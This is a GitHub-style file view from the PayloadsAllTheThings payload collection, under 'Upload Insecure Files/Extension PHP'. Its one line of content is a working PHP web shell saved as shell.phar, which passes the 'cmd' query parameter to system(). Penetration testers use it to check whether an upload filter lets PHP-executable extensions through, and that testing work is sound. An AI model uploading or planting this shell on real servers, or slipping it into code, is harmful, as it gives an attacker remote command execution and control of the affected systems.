PayloadsAllTheThings/Upload Insecure Files/Extension PHP/shell.phar

1 line
43 B
Plaintext
Raw Normal View History

2019-01-10 21:36:30 +00:00
<?php echo "Shell";system($_GET['cmd']); ?>